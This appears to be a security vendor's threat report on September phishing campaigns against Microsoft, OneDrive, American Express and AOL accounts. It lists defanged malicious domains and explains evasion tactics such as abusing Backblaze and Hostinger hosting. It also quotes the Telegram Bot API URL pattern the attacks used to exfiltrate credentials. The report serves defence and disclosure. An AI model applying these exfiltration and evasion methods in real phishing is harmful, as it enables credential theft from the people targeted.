The first half of September witnessed yet new records of Microsoft spearphish volume, with threat actors employing advanced evasion techniques, including payload encryption, device fingerprinting, and infrastructure abuse of reputable hosts like Backblaze, Hostinger, and Telegram’s Bot API. The same period saw sustained phishing targeting of personal accounts on work devices like American Express and AOL. Here are some examples and highlights.
stab[.]ru[.]com
e0ba4b4c729c46bda371ea8244d7a314[.]hanbookupdatecompliance[.]online
ameuricnapesires[.]com
slateblue-fox-104423[.]hostingersite[.]com
f005[.]backblazeb2[.]com
login[.]stawment[.]icu
apis-f7c[.]novabrightlab[.]ru[.]com
harbor-6eb[.]groovix[.]sa[.]com
cityofmorehead[.]blessing[.]com[.]de
vtkrdwha[.]hootouloo[.]sa[.]com
baylineliving[.]it[.]com
Microsoft and OneDrive Spearphish
Standing out during this period was a widespread campaign targeting users at Minnesota and Kentucky organizations. The below Microsoft spearphish was first clicked on September 10 by an administrator at a Minnesota organization with a lure about a document share via OneDrive.
The attack references multiple PDFs–PO393882.pdf and Item-list.pdf–suggesting the lure was regarding a purchase order and targeting procurement personnel. The page was hosted on Backblaze B2 for free TLS/CDN and reputation cover, similar to prior attacks leveraging the same with CloudFlare.
The site notably uses Telegram’s Bot API to exfiltrate credentials and sends them to multiple recipients for redundancy.
https://api.telegram.org/bot…/sendMessage?chat_id=…&text=…
This removes the need for costly attacker infrastructure, such as domains and TLS certificates, required to exfiltrate credentials. Instead, attackers get real-time alerts on their phones or desktops, while the traffic leaving the victim’s network moves through an otherwise reputable api.telegram.org channel.
The page further grabs geographic information of the user to send along with compromised credentials for additional targeting efforts. The same attack was clicked by six other staff members at the same organization on the same day, as well as employees at a Kentucky organization on September 11.
Also, leveraging legitimate infrastructure was an attack targeting a staff member at another Minnesota organization, who clicked the below Microsoft spear phish on September 9 that used Hostinger’s official *.hostingersite.com builder domain—a legitimate third-party hosting service.
We also observed numerous campaigns launching phishing attacks across a large number of servers, aiming to redirect and switch upon detection quickly. On September 10, a staff member at a Colorado organization clicked the Microsoft spear phish below.
newnewdomnewdefijbfjhi[.]stawment[.]icu
newnewdomnewbjbfcjfidd[.]stawment[.]icu
newnewdomnewcaiaibhdji[.]stawment[.]icu
newnewdomnewbdechaigda[.]stawment[.]icu
The page is built to run inside other pages or in-app browsers via iframes, and it rewrites cookie settings so its login data still works across their look-alike sites—even as browsers phase out third-party cookies.
In addition to stealing passwords, a concerning tactic we saw during the period involved stealthily obtaining consent from users for full access to their mailboxes. On September 4, a director at a Kentucky organization clicked the Microsoft spearphish below.
The same period saw threat actors harvesting credentials on Russian servers, using aggressive device fingerprinting for enhanced targeting, and soliciting 6-digit MFA codes. On September 8, an administrator at a Kentucky organization clicked the Microsoft spearphish below.
Personal Accounts Targeted on Work Devices
The period saw personal accounts targeted on work devices like American Express and AOL that included some similar TTPs seen in the above cases targeting corporate accounts. On August 31, a staff member at a Georgia organization clicked on the American Express phishing attack.
On September 11, multiple staff members at a Florida organization clicked on the below AOL phishing attack on their work devices.
Mitigations
Block the specified domains on corporate firewalls and endpoint security solutions.
Educate users about phishing risks even on pages that purport to use MFA
Remind users of phishing risks for their personal accounts that they access, even if they are on corporate devices
Enforce multi-factor authentication (MFA) on all corporate logins to reduce the risk of credential compromise.